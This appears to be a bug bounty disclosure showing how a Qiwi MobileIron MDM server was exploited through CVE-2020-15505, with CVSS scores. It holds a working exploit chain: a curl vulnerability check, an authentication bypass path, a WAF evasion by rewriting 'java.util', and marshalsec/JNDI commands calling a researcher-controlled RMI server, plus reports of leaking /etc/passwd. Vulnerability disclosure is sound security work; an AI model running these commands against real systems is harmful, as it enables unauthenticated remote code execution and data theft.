9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Last week, details about 3 CVEs affecting MobileIron MDM product were disclosed.
When combined, an attacker can achieve unauthenticated remote code execution with arbitrary Java deserialization vector :
The following blog post discloses the issues: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
The following github repo is a working PoC to reproduce the issues : https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
Advisory from vendor can be found here : https://www.mobileiron.com/en/blog/mobileiron-security-updates-available
Code execution is achieved by arbitrary deserialization in Java with Hessian protocol.
The /mifs/services/LogService endpoint does such deserialization.
Authentication is required by it can be bypassed with /.;/ (/mifs/.;/services/LogService)
By using the following check to determine is a host if vulnerable
curl "<HOST>/mifs/.;/services/LogService" -k -s | grep -q 'This method/operation is not allowed.' && echo "<HOST> - Vulnerable"
F990297
Iβve discovered that mdm.qiwi.com is vulnerable. The MDM User enrollment interface is reachable onhttps://mdm.qiwi.com
F990294
A WAF is protecting this host and thus blocking out of the box exploit code.
It matches and blocks requests containing essential java classes strings contained in the serialized object like java.lang / java.io / java.util :
F990300
F990301
The exploitation uses the code hosted on the following repo : https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
The steps are mostly identical.
This exploit uses a JNDI-based attack with a RMI server running on my VPS.
The final JNDI exploit contains only one string that triggers the WAF : java.util
F990309
Iβve managed to bypass the WAF without breaking the exploit code by replacing it by javb.util
F990356
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C <COMMAND>
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://<VPS_IP>/<REFERENCE> | sed -b 's/java\.util/javb.util/' > exp_rmi_qiwi
python hessian.py -u "https://mdm.qiwi.com/mifs/.;/services/LogService" -p exp_rmi_qiwi
Here are some proofs of my exploitation attemps to validate effective RCE :
F990322
F990324
Curl leaking /etc/passwd
F990327
F990328
Curl leaking /etc/resolv.conf
F990330
F990331
F990332
The curl user-agent is curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2
And requests came from IP 79.142.22.133
Since we are exploiting /mifs/ interface all commands are executed astomcat.
If we happen to exploit Management interface (/mics/) through this vulnerability, the commands may be executed byroot user (depending of the version of MobileIron)
By executing arbitrary commands on the server, an attacker can compromise the integrity, availability and confidentiality of the data of the server and also pivot onto other servers on the internal network.
Since this server is running a MDM product, an attacker can compromise it to attack Qiwi employees and/or compromise their mobile devices.
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%